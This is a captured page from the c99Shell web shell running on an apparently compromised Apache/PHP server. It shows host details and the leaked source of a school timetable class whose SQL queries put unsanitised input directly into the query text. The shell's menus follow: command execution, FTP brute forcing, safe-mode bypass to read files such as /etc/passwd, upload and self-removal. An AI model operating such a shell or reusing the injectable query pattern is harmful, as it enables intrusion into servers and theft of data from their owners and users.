!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/class/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     clsClassTimeTable.php (3.09 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//--Class ClassTimeTable--------------------------

include_once "clsbase_ClassTimeTable.php";

class 
ClassTimeTable extends base_ClassTimeTable{

function 
RSClassTimeTableLimit($xKey$start$pageSize){
    
$this->SetQuery("select * from ClassTimeTable where classId='$xKey' order by classId limit $start, $pageSize");
}

function 
RSClassTimeTableByClId($xKey){
    
$this->SetQuery("select * from ClassTimeTable where classId='$xKey' order by sequenceId");
}

function 
RSClassTimeTableByClIdAndDayAndPr($xKey$yKey$zKey){
    
$this->SetQuery("select * from ClassTimeTable where classId='$xKey' and weekDay='$yKey' and '$zKey' between timeSlotStart and timeSlotEnd order by sequenceId");
}

//-- Use on page processClass.php --
function SearchByKeyRoIdAndWD($ClsId$xKey$yKey){
    
$this->SetQuery("select * from ClassTimeTable where classId='$ClsId' and roomId='$xKey' and weekDay='$yKey'");
}

function 
SearchByKeyRoIdAndWDAndTss($AcY$SeM$Dy$rm$S1$E1){
/*    $sql="SELECT count(*) as num 
                     from Class c, ClassTimeTable t
                     where c.acadYear='$AcY' and c.semester='$SeM' and c.classId=t.classId and t.weekDay='$Dy' 
                     and t.roomId='$rm' and (t.timeSlotEnd >= '$S1' and t.timeSlotStart <= '$E1')";
    die($sql); */
    
    
$this->setQuery("select count(*) as num 
                     from Class c, ClassTimeTable t
                     where c.acadYear='$AcY' and c.semester='$SeM' and c.classId=t.classId and t.weekDay='$Dy' 
                     and t.roomId='$rm' and (t.timeSlotEnd >= '$S1' and t.timeSlotStart <= '$E1')"
);
    
$result=$this->GetResult();
    return 
$result['num'];
}

function 
RSClassTimeTableByRoIdAndWDAndTss($AcY$SeM$Dy$rm$S1$E1){
    
$sql "select * from Class c, ClassTimeTable t 
            where c.acadYear='$AcY' and c.semester='$SeM' and c.classId=t.classId and t.weekDay='$Dy' 
            and t.roomId='$rm' and (t.timeSlotEnd >= '$S1' and t.timeSlotStart <= '$E1')"
;
    
$this->setQuery($sql);
}

function 
SearchByKeyRoIdAndWDAndTssAndCoIdAndSectionAndOVL($AcY$SeM$Dy$rm$S1$E1$coId$section){
    
$this->setQuery("select count(*) as num 
                     from Class c, ClassTimeTable t
                     where c.acadYear='$AcY' and c.semester='$SeM' and c.classId=t.classId and t.weekDay='$Dy' 
                     and t.roomId='$rm' and t.timeSlotStart='$S1' and t.timeSlotEnd='$E1' 
                     and c.courseId='$coId' and c.section!='$section' and t.overlap='Y'"
);
    
$result=$this->GetResult();
    return 
$result['num'];
}

function 
RSClassTimeTableByAcYAndSe($xKey$yKey){
    
$this->SetQuery("select * from ClassTimeTable t, Class c where t.classId=c.classId and acadYear='$xKey' and semester='$yKey' order by sequenceId");
}

function 
SearchByKeyClsIdTseTssWD($ClsId$S1$E1$WD){
    
$this->SetQuery("SELECT count(*) as num from ClassTimeTable t where t.classId='$ClsId' and (t.timeSlotEnd >= '$S1' and t.timeSlotStart <= '$E1') and (t.weekDay='$WD')");
    
$result=$this->GetResult();
    return 
$result['num'];
}

//-- Use on page beforeShowClassStudy.php --
function SearchCTTByClsIdWdSt($ClsId,$wd,$st){
    if(
$this->SetQuery("select * from ClassTimeTable where classId='$ClsId' and weekDay='$wd' and timeSlotStart='$st' ")){
        return 
1;
    }else{
        return 
0;
    }
}
//-- The end --

//--End class ClassTimeTable--
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--